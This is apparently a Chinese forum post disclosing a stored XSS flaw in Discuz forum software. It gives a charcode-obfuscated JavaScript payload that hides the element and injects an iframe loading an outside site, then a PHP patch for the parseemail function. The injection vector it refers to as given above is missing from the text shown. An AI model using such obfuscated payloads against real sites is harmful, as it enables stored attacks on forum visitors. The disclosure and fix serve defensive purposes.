discuz 通杀版本存储型xss 0day

　　鸡肋在于，要鼠标触碰才能触发。

　　把上面的alert(/DZ-XSS-0DAY/)

　　换成

　　eval(String.fromCharCode(116,104,105,115,46,115,116,121,108,101,46,100,105,115,112,108,97,

　　121,61,34,110,111,110,101,34,59,102,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,

　　101,69,108,101,109,101,110,116,40,34,105,102,114,97,109,101,34,41,59,102,46,115,114,99,61,

　　34,104,116,116,112,58,47,47,119,119,119,46,98,97,34,43,34,105,100,117,46,99,111,109,34,59,

　　102,46,104,101,105,103,104,116,61,34,51,48,48,34,59,102,46,119,105,100,116,104,61,34,51,48,

　　48,34,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,

　　84,97,103,78,97,109,101,40,34,98,111,100,121,34,41,91,48,93,46,97,112,112,101,110,100,67,104,

　　105,108,100,40,102,41,59))

　　修复方法：

　　Discuz!X 系列程序

　　修改文件 source/function/function_discuzcode.php

　　Discuz 6-7.2程序

　　修改文件 include/discuzcode.func.php

　　修改方法:

　　1. 查找代码: function parseemail($email, $text) {

　　2. 在后面增加一行代码:

　　$text = str_replace(‘\”‘, ‘”‘, $text);